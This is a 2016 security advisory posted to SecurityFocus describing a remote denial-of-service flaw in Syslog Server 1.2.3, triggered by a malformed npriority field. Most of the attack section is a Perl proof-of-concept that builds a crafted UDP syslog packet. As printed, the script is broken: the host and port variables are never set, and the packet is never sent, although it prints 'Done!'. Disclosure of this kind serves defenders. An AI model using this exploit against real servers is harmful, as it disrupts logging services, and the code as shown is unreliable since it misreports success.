Syslog Server "npriority" field remote Denial of Service vulnerability Jul 04 2016 06:42PM
chaoyi huang connect polyu hk
Title: Syslog Server "npriority" field remote Denial of Service vulnerability
Software : Syslog Server

Software Version : Syslog Server 1.2.3

Vendor: https://sourceforge.net/p/syslog-server/

Vulnerability Published : 2016-07-02

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Syslog Server 1.2.3 is a free syslog server for Windows systems.
The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet.

Proof Of Concept :
#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);


die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));

$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";

$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;

$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
print "Done!\n";


Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk
mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com
Pentester/Independent Researcher

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus